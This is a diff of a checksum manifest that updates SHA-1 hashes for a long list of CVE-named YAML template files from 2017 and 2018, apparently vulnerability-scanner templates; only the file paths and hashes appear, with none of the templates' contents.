http/cves/2017/CVE-2017-15287.yaml:6000296cdf09698cffa12c51e003822697406662 http/cves/2017/CVE-2017-15363.yaml:1ff2f8921e452c8a14847f6dee1c5340ce2e4e49 http/cves/2017/CVE-2017-15647.yaml:f63b7309ad40a6ccf4c6af1f518e911416eb2ec3 -http/cves/2017/CVE-2017-15715.yaml:efe915f2fd523d0e3d9cf9b29e0e6397cfa19149 -http/cves/2017/CVE-2017-15944.yaml:fc133715accd0ad9a65b56f92e8a429494f046a0 -http/cves/2017/CVE-2017-16806.yaml:bcacb1043654c818b2ab5fc9de5fb9bc05579b1f -http/cves/2017/CVE-2017-16877.yaml:be9ffb239e9d692bdbc98071720d8895b9fd4d1c +http/cves/2017/CVE-2017-15715.yaml:27f869507d13b8dedc776c4fb9c4063c8dd73c3d +http/cves/2017/CVE-2017-15944.yaml:0dbecebb30affc23bec8b2a1193ffc5cb92ed3b3 +http/cves/2017/CVE-2017-16806.yaml:01a0fb38f29898ae3ee66414fd284d286c8af403 +http/cves/2017/CVE-2017-16877.yaml:a5759ca704cd8d23987d433fa76c18a18424220a http/cves/2017/CVE-2017-16894.yaml:cc779a98a64aa8bbeb1694c3f0922a45974063b6 -http/cves/2017/CVE-2017-17043.yaml:4ecedc3af33c37de40d7de410d482bc8bdd1b6b5 -http/cves/2017/CVE-2017-17059.yaml:8e1f808c593421881893246f3f569795cb5c9809 -http/cves/2017/CVE-2017-17451.yaml:996d75504b1efc63787d35dcf5bfbdf79109ffb8 -http/cves/2017/CVE-2017-17562.yaml:d9c6119f0250b1c1e561268994badaeca6b6d3d3 +http/cves/2017/CVE-2017-17043.yaml:d66d885d7578369ae2b82e2e985e722e324dddd9 +http/cves/2017/CVE-2017-17059.yaml:423a292f21591120f88595e2138cab3dc318a902 +http/cves/2017/CVE-2017-17451.yaml:cfdd77524c14ea2d409baea560ea2f0853e6b8a8 +http/cves/2017/CVE-2017-17562.yaml:9547b1a2aad01541a5002fdfe7bc5e9e477e9963 http/cves/2017/CVE-2017-17731.yaml:3f51a3a99f2e8b5bfd36c145bbabaea0607acd75 -http/cves/2017/CVE-2017-17736.yaml:25208e44bc9dc7c21610939cd52248407d0a9c7b -http/cves/2017/CVE-2017-18024.yaml:78fd69b941954a1798dd36385f578b8e6ef9c5e6 -http/cves/2017/CVE-2017-18487.yaml:6935d143eca3c0c0b2114f162c63ff68e65364ab -http/cves/2017/CVE-2017-18490.yaml:208d02fd73a3be7ad8cf4921987062b8f1b44cfe -http/cves/2017/CVE-2017-18491.yaml:842f490cc1ce8f6783736c9c39ba34c063a0942f -http/cves/2017/CVE-2017-18492.yaml:47602a52ca1122e6f68cdd144604c70737c40930 -http/cves/2017/CVE-2017-18493.yaml:17dcb7a769ae5fddb2ada02d71c438a8ed8f5941 -http/cves/2017/CVE-2017-18494.yaml:b8df1f7191cebbb55aed4fad6d5eaf130fdbbc9c -http/cves/2017/CVE-2017-18496.yaml:bfafcdc74967f073e1bc2b5b174e4c0a1d484fbf -http/cves/2017/CVE-2017-18500.yaml:9910fc572e5a3631b4ef738523a2db880a579acd -http/cves/2017/CVE-2017-18501.yaml:b496cd413e7d05e1ac162687838c0cacbc590d66 -http/cves/2017/CVE-2017-18502.yaml:269018719c901096efb52d104d2d3f8651d6629a -http/cves/2017/CVE-2017-18505.yaml:9a41e6be2699c03bec2ce41d81d9ca175d435252 -http/cves/2017/CVE-2017-18516.yaml:24e82950664cdf5fbd79f2944e3083afb0a891fd -http/cves/2017/CVE-2017-18517.yaml:d41caf3f42982bcf313e4be2f0ba9a8df98184bb -http/cves/2017/CVE-2017-18518.yaml:cd8537572230fa88ec78d3b6c9509ba7fcb43d7d -http/cves/2017/CVE-2017-18527.yaml:d0b57cc290e45c6eee46766933210901c53ccd11 -http/cves/2017/CVE-2017-18528.yaml:a63ad8d19db7a1ca7e4a7c7eb724bc1f172bff44 -http/cves/2017/CVE-2017-18529.yaml:0120c9b0d8f81576756fd3aeeda2c4d0d4abe05e -http/cves/2017/CVE-2017-18530.yaml:fd5d1cc43cc698ffbbd8d503b57088ec71677eb6 -http/cves/2017/CVE-2017-18532.yaml:49a23b489011e2867db195ab65c1b0f72cbf1e75 -http/cves/2017/CVE-2017-18536.yaml:4711a9310f4e0b2304a7e98e50839149d9518e76 -http/cves/2017/CVE-2017-18537.yaml:74cd88a458cf737926650c6b54eef76097f53240 -http/cves/2017/CVE-2017-18542.yaml:1599af8ede55d1f0e3ac1a657b4ff8ed9b6448a9 -http/cves/2017/CVE-2017-18556.yaml:907a09d41a0d88070f8f2041fdb11c16e85bfbcf -http/cves/2017/CVE-2017-18557.yaml:c45088f07f554991bb2f0f483866395a6068f497 -http/cves/2017/CVE-2017-18558.yaml:16f29bd3ea8ca20ea876e0716ee3083fff491790 -http/cves/2017/CVE-2017-18562.yaml:fee3135f7a5a62a0e6fe691075b1ee9fd61c76cc -http/cves/2017/CVE-2017-18564.yaml:3c3b33cc2efbe4112199dc4d9326fb7e9071270f -http/cves/2017/CVE-2017-18565.yaml:a3b3a2ad8c5c28e69e03af3629ae9ed998fab3bc -http/cves/2017/CVE-2017-18566.yaml:91dd65d7d06d53ba0392a9408ab7c5a6f6ed364c -http/cves/2017/CVE-2017-18598.yaml:03e5aee9bf9d77842f6442ced256a8645c16a0eb -http/cves/2017/CVE-2017-18638.yaml:5a7f0211b67dc45557b1d6078fc6f82a76585398 -http/cves/2017/CVE-2017-3506.yaml:b90e80de67334cc4273e54b2ffad415d77b74251 -http/cves/2017/CVE-2017-3528.yaml:1adb19d08d323349670d12a7176eaa18b904d2c0 -http/cves/2017/CVE-2017-4011.yaml:d26bb4b50d4f448143635e92a93cabd68e6cd479 +http/cves/2017/CVE-2017-17736.yaml:70a8d778dc0695ca6f3e7875e8ca29aabe8eefbc +http/cves/2017/CVE-2017-18024.yaml:7ad02d50552197493d2329d6750671539f097603 +http/cves/2017/CVE-2017-18487.yaml:18c6da8e5ed2e735a102165398d971d35cd96fcb +http/cves/2017/CVE-2017-18490.yaml:aba5f23b2aef25445c641328a6ddc3e987bc8f0e +http/cves/2017/CVE-2017-18491.yaml:87c9b463bdfa96302ff4018e7e55df14a8892a8a +http/cves/2017/CVE-2017-18492.yaml:cf11958620dcfe04715b3e510fec476d0ac23af5 +http/cves/2017/CVE-2017-18493.yaml:6e99015904657d7324ee061d06a4f38938fe5e64 +http/cves/2017/CVE-2017-18494.yaml:a1a215937628bac45037637e3b56de380fe1fc5b +http/cves/2017/CVE-2017-18496.yaml:c918d0780a51c89081a65e495fed915d32c6d989 +http/cves/2017/CVE-2017-18500.yaml:328b89f371566ab0c7cc4ad131bb840605d3a110 +http/cves/2017/CVE-2017-18501.yaml:1963e8addb6e82ca38b406b512a15a4aaad84a09 +http/cves/2017/CVE-2017-18502.yaml:1ab4e124d406d2430332fc28bfb1451170ebd51e +http/cves/2017/CVE-2017-18505.yaml:a1b07dc2eb977736183e951ed2f7dacb8fdc9638 +http/cves/2017/CVE-2017-18516.yaml:cf6a0a1c40c0bfd362bfc15605689f155be88305 +http/cves/2017/CVE-2017-18517.yaml:c7144d2eb0744b8ec32b547c3e2f42de76396ad2 +http/cves/2017/CVE-2017-18518.yaml:b993c19050e2224a427f62975d0428f1e1a93909 +http/cves/2017/CVE-2017-18527.yaml:4381542ae3dda5483088fe923f8c4ccddc4110e0 +http/cves/2017/CVE-2017-18528.yaml:d3c1ed61c27edf32241fe9dbea66b001054f184a +http/cves/2017/CVE-2017-18529.yaml:815c2dac5e98cc90c59c0f44ab02ce6f4af2a698 +http/cves/2017/CVE-2017-18530.yaml:b948f523f2a8f4a2d4ff22f216a6da7a7c14cb5a +http/cves/2017/CVE-2017-18532.yaml:527911bf8931c9cc9a89c6dd47f72e1e917e8d01 +http/cves/2017/CVE-2017-18536.yaml:be20e319ddf44c48e682606863c8bb669169b73b +http/cves/2017/CVE-2017-18537.yaml:323652d96c20ca84bbf364b0c39c489c879a2be9 +http/cves/2017/CVE-2017-18542.yaml:4860bdedb8eef5f2f25a6eb543757f6e081e528b +http/cves/2017/CVE-2017-18556.yaml:0e9aa4dd05abcaa53bd8659715d53e8127a82230 +http/cves/2017/CVE-2017-18557.yaml:8836164173657270b90495bcc3b07b50b3416949 +http/cves/2017/CVE-2017-18558.yaml:9c20a4c29e4af9f616d1cb76b7d71a990bddeff1 +http/cves/2017/CVE-2017-18562.yaml:2b0e335f62ace14516ca1d2b53eabb5e91fb4c4c +http/cves/2017/CVE-2017-18564.yaml:12c5ce5624db3a6ba010aa3ea9ba7c55d53f5ecc +http/cves/2017/CVE-2017-18565.yaml:68a894157caff6326df9bfef799d7d19647ff97d +http/cves/2017/CVE-2017-18566.yaml:28e689c2192d98d78215ef0d9178cd61645644b5 +http/cves/2017/CVE-2017-18598.yaml:741d867d16cacf520035fa44376841fdd2a4181a +http/cves/2017/CVE-2017-18638.yaml:9c3a2bf93f02877b319955bf5112b033815fb876 +http/cves/2017/CVE-2017-3506.yaml:837bfce7c2c79bb9b7598e4c594e44cd0dceec41 +http/cves/2017/CVE-2017-3528.yaml:33a1816704db08e4d524156a6a9c2dd3abd6df92 +http/cves/2017/CVE-2017-4011.yaml:9148db4589b153f37f6a0b1b357f4415564c1ff6 http/cves/2017/CVE-2017-5521.yaml:441d7bb12801dc564993e7673c6c9c31ab43f79c -http/cves/2017/CVE-2017-5631.yaml:da5852f436aefece302a1795b05e028153ab7b30 -http/cves/2017/CVE-2017-5638.yaml:065653ee455cb2dee7baa8690bd3dd5835cd14d4 -http/cves/2017/CVE-2017-5689.yaml:7e2c312474c7166e2af89aab6323de72d9e6c5d7 +http/cves/2017/CVE-2017-5631.yaml:1f75e71390098a2b178d30761f6527297ecce195 +http/cves/2017/CVE-2017-5638.yaml:f20f009e50a91ed6246b1ad844e8e0271cc31587 +http/cves/2017/CVE-2017-5689.yaml:3d378636d73676ad81608d04a18ae472cfb7f122 http/cves/2017/CVE-2017-5982.yaml:2cc9e80970cd0d0f3fddf4e79b615e8f80f945be -http/cves/2017/CVE-2017-6090.yaml:b28b3e28c0d52c2ee367c9c78b2ad913f0949d6b -http/cves/2017/CVE-2017-7269.yaml:9e313436b09e4f8ae88a198f58760f9a55373578 -http/cves/2017/CVE-2017-7391.yaml:e25d7a726fa44b926c005349fe3b65d9a3e1794f -http/cves/2017/CVE-2017-7615.yaml:4a3e9b8299a0258fedc1a737b810f61719302640 -http/cves/2017/CVE-2017-7855.yaml:e26b772308e8bd2eb841ec9fac729d5c2a37117e -http/cves/2017/CVE-2017-7921.yaml:a3d08122f2cae7319d19420e4cf6049c0c6d7104 -http/cves/2017/CVE-2017-7925.yaml:5d5edc67fc9b754ca8943764e11aeb06672ea8e2 +http/cves/2017/CVE-2017-6090.yaml:d2183a769b5e19fad263ff1676513f9e07acfa87 +http/cves/2017/CVE-2017-7269.yaml:05bdd55c99449dc10ce011f6cf0af28e32fdf894 +http/cves/2017/CVE-2017-7391.yaml:4646b749c40f4cc3537b3209b2b12dfdc5815f5c +http/cves/2017/CVE-2017-7615.yaml:0170f8be9ad3a523febbf30981796d08e3acb2b0 +http/cves/2017/CVE-2017-7855.yaml:fba622d2ce8474a21e56e12b00bdf6272866cf9e +http/cves/2017/CVE-2017-7921.yaml:288e08111c5be77443c8a2f8fe38664718bd35d8 +http/cves/2017/CVE-2017-7925.yaml:df55d9a466ec0d118376375b8d24822dc201aae4 http/cves/2017/CVE-2017-8229.yaml:5904f7e455bf3a8b4fdc772fb95abc1429f1ab66 -http/cves/2017/CVE-2017-8917.yaml:929fb18d698372ce898881effd2f6f52b64cda39 -http/cves/2017/CVE-2017-9140.yaml:8f987038728da169dbe6bc9eba7d3f5b46a90a28 +http/cves/2017/CVE-2017-8917.yaml:18eb560c3ae4a68bfb37e8e314b93ca835523ccc +http/cves/2017/CVE-2017-9140.yaml:185afc688b01aaa345e8891bfb89303663d71e13 http/cves/2017/CVE-2017-9288.yaml:f8dedeb9681681df484b827a5b6202feb453f565 -http/cves/2017/CVE-2017-9416.yaml:3af72783c0b6784c6b8ac1c6584d354202aee50e -http/cves/2017/CVE-2017-9506.yaml:e034c8c940863230d32ac825126b538b4db42f68 -http/cves/2017/CVE-2017-9791.yaml:00efcf8bf37fe77ed2534d335bf4e86f540593ac -http/cves/2017/CVE-2017-9805.yaml:4fe5223d9747e0cd6872564b8069d1d2074a8fdc -http/cves/2017/CVE-2017-9822.yaml:137875cd55de914baf6ad6cca7783b728484715c -http/cves/2017/CVE-2017-9833.yaml:c08b62014c13f6adbdf1b39fb6199d35f4df773c +http/cves/2017/CVE-2017-9416.yaml:db3a9e47909c6f2171b1e6ace465413df850e426 +http/cves/2017/CVE-2017-9506.yaml:6d296062b2c0a14857813ac8db198c208fc16c12 +http/cves/2017/CVE-2017-9791.yaml:14d06a00a2028cd5e48c65d7cbb5cd3a51399910 +http/cves/2017/CVE-2017-9805.yaml:81c3794f70f5ec9e768e11d5db0fa414b0732043 +http/cves/2017/CVE-2017-9822.yaml:c75acad11d35633968cb7f334420707edb941c1a +http/cves/2017/CVE-2017-9833.yaml:9aba0bb0c7751c252e7bf7ea5fd2e7ee78ddb555 http/cves/2017/CVE-2017-9841.yaml:b17dc781f051451822729dad1584ffc0a690d41a -http/cves/2018/CVE-2018-0127.yaml:b01f3b431d398441068d16cea655f42cd95a76dd +http/cves/2018/CVE-2018-0127.yaml:0f92834c92edc1e4e6fb9f1c0de00ede97dc410f http/cves/2018/CVE-2018-0296.yaml:8f811f713bd26781e42619b8ad3cdc084297b52c -http/cves/2018/CVE-2018-1000129.yaml:03328d29e7ad3ec82f00b8de687d940ec9060db9 -http/cves/2018/CVE-2018-1000130.yaml:c82881e9663b78ba5b44251f15b4e93555896100 -http/cves/2018/CVE-2018-1000226.yaml:4f0216946fd65c64fab71cb3f17771ea0c2b69b4 -http/cves/2018/CVE-2018-1000533.yaml:cdd21ba5b7737e1f0998ec7435a96567e94b642b +http/cves/2018/CVE-2018-1000129.yaml:61c2fdfd04f6c32faad5ebd2e7aa4d4c324a59ee +http/cves/2018/CVE-2018-1000130.yaml:f438d5219e7182e5013ca0f3fb3cd42011642ae9 +http/cves/2018/CVE-2018-1000226.yaml:441edaab2341a22ae577dbd23ae9468d5a73ffa4 +http/cves/2018/CVE-2018-1000533.yaml:948a6a9de7072936bbca5c7d7388c91ef52bc4d3 http/cves/2018/CVE-2018-1000600.yaml:910c040b7e95fb65e496c661906baaf38381897a -http/cves/2018/CVE-2018-1000671.yaml:44d8fe0eac2ae78b9d22edb73595990c06ebde57 -http/cves/2018/CVE-2018-1000856.yaml:69dcdc3b6ac4d491f9b496f8b50b8ba140eeebe4 -http/cves/2018/CVE-2018-1000861.yaml:61dae654149f3cee58e21f62a05e4b2fae52438c +http/cves/2018/CVE-2018-1000671.yaml:8d16d19b0cc9c32fb10b68f382e9da526e243533 +http/cves/2018/CVE-2018-1000856.yaml:1bd6db921f03613d4e0f5f1b74341cb229675d76 +http/cves/2018/CVE-2018-1000861.yaml:19d67582d28f6a4ab97c800961d4b69d1c13c958 http/cves/2018/CVE-2018-10093.yaml:c9b9167e15f9893649b46486f1cd02ddbadcf6af http/cves/2018/CVE-2018-10095.yaml:b575dc701664434c37703e8ecd03ad7b09e924d8 -http/cves/2018/CVE-2018-10141.yaml:a99b6696843034f25e51641e8a55b5a827e56caa +http/cves/2018/CVE-2018-10141.yaml:660c2a25c83aafda43e6bce0992cc916a0108db7 http/cves/2018/CVE-2018-10201.yaml:e3825699cee6c241f0a763a3d9d3eb0c07723d9c -http/cves/2018/CVE-2018-10230.yaml:2bf1607129fe202955a8f46a3745d2e7daa0a430 -http/cves/2018/CVE-2018-10562.yaml:8c60453b28e05f86ec595fa3b988cc59e1ce05ea -http/cves/2018/CVE-2018-10735.yaml:43eb94c84eb1e72070c54a912b00b7df1c21283c -http/cves/2018/CVE-2018-10736.yaml:0ccd2808913e1421e39912acc3b0c01463b827f2 -http/cves/2018/CVE-2018-10737.yaml:bf3893cedbfd6b1086d77e0d6b15b1e3c62b7536 -http/cves/2018/CVE-2018-10738.yaml:fae02457f302fd57c9b91ffa8bd3b716d0cc30a6 +http/cves/2018/CVE-2018-10230.yaml:605cf859fd96ff7e9df95aa31ea7037f31f4534c +http/cves/2018/CVE-2018-10562.yaml:0f2de60fa8395472e584d1731c0e94482f070ff2 +http/cves/2018/CVE-2018-10735.yaml:7ae8a70c70fc84d480e2a84dd90da750053a6252 +http/cves/2018/CVE-2018-10736.yaml:4539e3b3bc9c95fec713e4473dcd9706839a84fb +http/cves/2018/CVE-2018-10737.yaml:60b40993477e1edd14ed412903f9fad6a97ff5d0 +http/cves/2018/CVE-2018-10738.yaml:b6927d277dea39fb3a3af753bea42b23d769f34a http/cves/2018/CVE-2018-10818.yaml:efa3271174cdf4babcac2932f09ca4d5e35b49d2 http/cves/2018/CVE-2018-10822.yaml:7f0a230ae784c9666bb8be847c4b06e77ecf6a28 -http/cves/2018/CVE-2018-10823.yaml:ef89ea35d46f99e0318b8b0c1bf37ffe8cbee9a7 -http/cves/2018/CVE-2018-10942.yaml:ef196223e27d393c09d9f2ed5421d599f2d33cc7 -http/cves/2018/CVE-2018-10956.yaml:1ebc2fdb8426f38e9ca6d2c3bf02241c83d8f40b -http/cves/2018/CVE-2018-11227.yaml:0704dcac407abd6440c698cccfc3aba93291059d +http/cves/2018/CVE-2018-10823.yaml:e56ee0f2e55b63e521584879d4b3323de92515af +http/cves/2018/CVE-2018-10942.yaml:94d0ecb193f659447722f98f25a13f0a514e2bb4 +http/cves/2018/CVE-2018-10956.yaml:239655fecf2e6394829d36f8d14c29ca20f80c43 +http/cves/2018/CVE-2018-11227.yaml:6479757ec8c8091338264768aab66c062db6aac6 http/cves/2018/CVE-2018-11231.yaml:51626c805600f217d4c3eb66418488e1e9b39398 -http/cves/2018/CVE-2018-11409.yaml:1c10e1483e2f51965c66795eee34dd3394a21260 -http/cves/2018/CVE-2018-11473.yaml:471b0340786a579e3b4968f36d5cda80b370dbdc -http/cves/2018/CVE-2018-11709.yaml:36ce75376e3339ca9324e2ffa05f1daac5659936 -http/cves/2018/CVE-2018-11759.yaml:7cdec7352e198fb22c496626905497dba38cdd2a -http/cves/2018/CVE-2018-11776.yaml:2c098c86e47d5392b52f3b5ff6995a7bffd985a2 -http/cves/2018/CVE-2018-11784.yaml:d81453029d720837f9a1327444ba0bcf0bfa186b -http/cves/2018/CVE-2018-12031.yaml:8a71c917a741e3eeaffd76ddfe7024b0fdaf0e52 +http/cves/2018/CVE-2018-11409.yaml:6a4092b60a8e09019a0b5c8d263ad8a26f3631dd +http/cves/2018/CVE-2018-11473.yaml:69638aa8a17e8bf9285d88ec0100bd69c36987a6 +http/cves/2018/CVE-2018-11709.yaml:41665abe4890a3b6a73e6019aa9caa22364280ad +http/cves/2018/CVE-2018-11759.yaml:3a5574ca3617542788df6812fb710bbf37cfc098 +http/cves/2018/CVE-2018-11776.yaml:be84324e3b216b65994af263fe66173838e1f212 +http/cves/2018/CVE-2018-11784.yaml:f978f633c1ace52039333d342a53302e110e183a +http/cves/2018/CVE-2018-12031.yaml:535cbea2cfbdae172d980a0433cb660415257246 http/cves/2018/CVE-2018-12054.yaml:4bd015a55fedc7b0cf898eaf9a3049aad883ac05 http/cves/2018/CVE-2018-1207.yaml:d725ed522674e6fe25fe4a413ecba7fe32a1b864 http/cves/2018/CVE-2018-12095.yaml:7c6d4a16cc5c42673c2f23abb768466b6164d306 -http/cves/2018/CVE-2018-12296.yaml:81c4449cad426deb65bea9c7f88c347ab742d580 -http/cves/2018/CVE-2018-12300.yaml:f36058d3e5f3378793aa6cbf9fba01c8f3f31aff -http/cves/2018/CVE-2018-12613.yaml:20b01be7333db300b27d0446c0978cabd9707a0a -http/cves/2018/CVE-2018-12634.yaml:8c012f3c4b96c0a9e84395277b16cf1228b3b3d3 -http/cves/2018/CVE-2018-12675.yaml:300d9fe96c71039c79c7413cc169996b23f2229c -http/cves/2018/CVE-2018-1271.yaml:32e25597cdb4409a6316b4cf6dcb8c7ee47f8981 +http/cves/2018/CVE-2018-12296.yaml:8624bcc28a481bf2535cc047138dbf99a97059ea +http/cves/2018/CVE-2018-12300.yaml:99e1abfc6ea6de4f0699fab1122ff20851681934 +http/cves/2018/CVE-2018-12613.yaml:7fe270962d84ef0e3b411c4c4b5ba4f1aa1a1a5c +http/cves/2018/CVE-2018-12634.yaml:dd631be288be4040ece786fb77e56f085f4359fd +http/cves/2018/CVE-2018-12675.yaml:2b74ddc9e7457002f67d3a52276d1e18b2611ff7 +http/cves/2018/CVE-2018-1271.yaml:def7079fda8992783a771bb074e292b823f826c8 http/cves/2018/CVE-2018-1273.yaml:51f89909ec1b94e979c85d95d7bdc5797fbf8606 http/cves/2018/CVE-2018-12909.yaml:e3190dfe0c8354393d283dc3bbe60b472953e024 http/cves/2018/CVE-2018-12998.yaml:47f498dbb37559c753c8fac62600c63ff9a9c791 -http/cves/2018/CVE-2018-1335.yaml:6ef3bfadce1fcdd974ba24d212051e01b43ccbf7 -http/cves/2018/CVE-2018-13379.yaml:527a98b1ac31c5b6be0cb0b6580a53e7c768f872 -http/cves/2018/CVE-2018-13380.yaml:4e658359e0578a268129777aceacfdca08cd0e94 -http/cves/2018/CVE-2018-13980.yaml:0a81dc6b2ec1918e8b6ff9a0f52b720c97a32d5e -http/cves/2018/CVE-2018-14013.yaml:ec9dd4858dd85058fb9e5a81219ff2a54fc6987c +http/cves/2018/CVE-2018-1335.yaml:603d12a7eb5a2415e5d67e27eb4299722131310e +http/cves/2018/CVE-2018-13379.yaml:f4abeb12dd4cc5a62fbb1a6cea10090e265f2fb2 +http/cves/2018/CVE-2018-13380.yaml:8734feef8b6a70208db1067f8b6cd9a7f3db74dc +http/cves/2018/CVE-2018-13980.yaml:7d2ea83edff58f4023bfc2103a74e1fcecb6540e +http/cves/2018/CVE-2018-14013.yaml:2193441a1af6243edc682037946f8d4ce4ce400c http/cves/2018/CVE-2018-14064.yaml:cccc793c46719cb2a7e81374f651331c60a7890b -http/cves/2018/CVE-2018-14474.yaml:8f686d3bf853b49a404a5c5a1284af902f0b0c3c -http/cves/2018/CVE-2018-14574.yaml:6c396f30ec5c31d76ad7b4e3de1d4d894c87ea03 +http/cves/2018/CVE-2018-14474.yaml:1a6a7c21e82b7d962e5394b5bfa2582ff74885d0 +http/cves/2018/CVE-2018-14574.yaml:d93505082cac96cda4c20d151d07985e81e550b4 http/cves/2018/CVE-2018-14728.yaml:3005fff6268e3e0079028fc907bcad293f3d69fa -http/cves/2018/CVE-2018-14912.yaml:cfafc16d11a1025dfcc32d6469c744a5feea4b66 -http/cves/2018/CVE-2018-14916.yaml:6887d4ce26a0ecc4735fc4c5d8f37637eea93630 -http/cves/2018/CVE-2018-14918.yaml:205df3e7d32d50a784be380c63299e602696d477 -http/cves/2018/CVE-2018-14931.yaml:a7fcc8eec961c5072b49b17567b2be191c291ceb +http/cves/2018/CVE-2018-14912.yaml:2e747fd7af4ad0250013a6a968dc2409c9eb5beb +http/cves/2018/CVE-2018-14916.yaml:99366bc99fc0a290c76a8719866cd70af5132ffd +http/cves/2018/CVE-2018-14918.yaml:3337bed476d83b757d2a50868709dfb6d4265730 +http/cves/2018/CVE-2018-14931.yaml:aec3137733c19a46022e5e0158bfe0e57270a3fd http/cves/2018/CVE-2018-15138.yaml:73e253bb1cb6ea31e6a7e7be8c2486bf196671b2 -http/cves/2018/CVE-2018-15517.yaml:4b7560808f5e4dd8b12c2f82a6e8192884fc7131 -http/cves/2018/CVE-2018-15535.yaml:ea49358065dfc654a86b457abc330e8f3920cda1 -http/cves/2018/CVE-2018-15745.yaml:a8a8906f49938d40889e4eb1b783485da29dcab8 -http/cves/2018/CVE-2018-15917.yaml:f61fed939dd94d4879d745b667cc88305d0d09d8 -http/cves/2018/CVE-2018-15961.yaml:0e839c00023977ea5bbb312668d978924ad24ffd +http/cves/2018/CVE-2018-15517.yaml:23862903157263d68ee6212e53179f5172736730 +http/cves/2018/CVE-2018-15535.yaml:761f13a32b66cba3c805330fda03b152b374b2e0 +http/cves/2018/CVE-2018-15745.yaml:2893ecc4d1961e2138fe090242ff7e3b54951472 +http/cves/2018/CVE-2018-15917.yaml:83c37ef685d12355a32e18120c9ec156909926f9 +http/cves/2018/CVE-2018-15961.yaml:4def13527ee22108d3eb74d5e1eb9399a0140e42 http/cves/2018/CVE-2018-16059.yaml:992cc116f8f261abd69f4cb5b9934ce00d83e8e0 http/cves/2018/CVE-2018-16133.yaml:c01d3089c2ebbe72dfe0e54eb3e5c8626e19d362 -http/cves/2018/CVE-2018-16139.yaml:4a8ca0cf9ad80535057486bf695b3aadb02b20b5 -http/cves/2018/CVE-2018-16159.yaml:a82ccba80bd4d66e5237acf576666e62982ab6fb -http/cves/2018/CVE-2018-16167.yaml:0b3462ffa9b1c587834736d23ae699dacd58a194 -http/cves/2018/CVE-2018-16283.yaml:5390db52ec1a7cfc91eeb714a2ea60bdf8cc48e9 -http/cves/2018/CVE-2018-16288.yaml:cb8ed921a27e6383233a9db2cb92fd042baf8191 +http/cves/2018/CVE-2018-16139.yaml:e847bfca654dd23d574dbfe531b0a691cdcf56f6 +http/cves/2018/CVE-2018-16159.yaml:5b61de6617d5074efccf89df22d81ae7c7c8105f +http/cves/2018/CVE-2018-16167.yaml:f66679c3b289f3e28320055463f4f716317a2c1d +http/cves/2018/CVE-2018-16283.yaml:8a7a91b6b81b9d73042d3199b76a96d594fab657 +http/cves/2018/CVE-2018-16288.yaml:ef5d6815cfe1919acf321f56af943934b95c1baa http/cves/2018/CVE-2018-16299.yaml:b020da11f05eaa7a8b9eb2136b09cf8190b0b59c http/cves/2018/CVE-2018-16341.yaml:74ccee29760fe9aaf2616353755ab249f6f6fcfb http/cves/2018/CVE-2018-16668.yaml:48491a4b2add544918c03545451fc5ee424330f3 http/cves/2018/CVE-2018-16670.yaml:c346dc7a3d1df2c12c8f5f1afb69a09c1d785c9a http/cves/2018/CVE-2018-16671.yaml:906368ef356b2b4c8965f8046fd49dbef0dd821f -http/cves/2018/CVE-2018-16716.yaml:a1f2d156568e8a37a17de9a2759623c13ba02f41 -http/cves/2018/CVE-2018-16761.yaml:dbdf46a59546a320d395c2436fbca07cc9c1be86 -http/cves/2018/CVE-2018-16763.yaml:804e34994429a56b36f2447a635c4bdc5dd59a07 -http/cves/2018/CVE-2018-16836.yaml:98b608b7b785160c1ca398b8ccf5457933dafcbc -http/cves/2018/CVE-2018-16979.yaml:94bde7048fe9f62210ccb11497dbc11e1c3b1c99 -http/cves/2018/CVE-2018-17153.yaml:e004a49d22b96f5006592b6000346b3c51b7c321 -http/cves/2018/CVE-2018-17246.yaml:22c110b22233af042e989536ce8b723547993e00 -http/cves/2018/CVE-2018-17254.yaml:796bc823bb38f76e61b2c6a7b8d508a6a81a1cb8 -http/cves/2018/CVE-2018-17422.yaml:90edc0d3636a6670e628eccc7eea61be4144918b +http/cves/2018/CVE-2018-16716.yaml:c4e7b7d3daee903a199b68d440c6e41525746037 +http/cves/2018/CVE-2018-16761.yaml:4a6d90b317f11da3befdef5b89e497ce7876426b +http/cves/2018/CVE-2018-16763.yaml:f29c6f637d2868e53c10e7c2522b36b40842b00e +http/cves/2018/CVE-2018-16836.yaml:ceafe25bf42e256f10b38e6151c2c7a764259fa5 +http/cves/2018/CVE-2018-16979.yaml:0ecee03cdd86c219e76cfaeff5740908f61b5b4c +http/cves/2018/CVE-2018-17153.yaml:fed4c12e76a4a9c36932f7ca3effaeec9563db62 +http/cves/2018/CVE-2018-17246.yaml:5ebc30e64db945afbd0db95bf9bf73059e81752a +http/cves/2018/CVE-2018-17254.yaml:61a5b750c1409ce5d1b79c8859212fd4bcac1467 +http/cves/2018/CVE-2018-17422.yaml:2f9d775f67d43eecf8d145ffd01aed37075356bc http/cves/2018/CVE-2018-17431.yaml:4f724c2ec11d7e5574b913c8f3d171dc69bf23d6 http/cves/2018/CVE-2018-18069.yaml:fb55c1c8a6544261d3da494f50ffe75d12262d5c -http/cves/2018/CVE-2018-18264.yaml:60ce8b84365948ec6e4225928dd0c460f0d07cfc -http/cves/2018/CVE-2018-18323.yaml:de7bca30fc594d2a64c3cbd1290e7c06ea6a586e -http/cves/2018/CVE-2018-18570.yaml:ccadef30f166b018d3c6b6191d6469b4b87d7d3a -http/cves/2018/CVE-2018-18608.yaml:6b07f6e0ac8275789cd298b92273b007fb0137fe +http/cves/2018/CVE-2018-18264.yaml:e49855501e1ea92e2e18f03868942e2be2075e2c +http/cves/2018/CVE-2018-18323.yaml:49ada4a8a0e4a8a1cdc9f8d6fb5a2f3b801c5e14 +http/cves/2018/CVE-2018-18570.yaml:1eeeb647ad50a374103212462630e86944fcc129 +http/cves/2018/CVE-2018-18608.yaml:c9faa9dee45e2512ccbe1891582889f90ab4f752 http/cves/2018/CVE-2018-18775.yaml:6855fbb7653fb75ebfb58a92e13a94bddd6363e7 -http/cves/2018/CVE-2018-18777.yaml:187888ecf9a654e21ab7d5ff2705080de8c592ff -http/cves/2018/CVE-2018-18778.yaml:453874de53580b3303492f809be7b47d244ac9e5 -http/cves/2018/CVE-2018-18809.yaml:a2e9673355eb887dd72422a1e1ba57fcc1544381 -http/cves/2018/CVE-2018-18925.yaml:b111c828cbe0924cf80c4f9f5c1692e2f4c86b74 +http/cves/2018/CVE-2018-18777.yaml:ba4f0ce809e6bbf9633df218956f1b0cc2842bfa +http/cves/2018/CVE-2018-18778.yaml:137375a1f30ee0567998a4c4a609986093bcefde +http/cves/2018/CVE-2018-18809.yaml:39b8141f44a0ee669fdb7e35058f7c6ff3541fc9 +http/cves/2018/CVE-2018-18925.yaml:21c1e900a4b8a05b95c2f0f557379654ae498afd 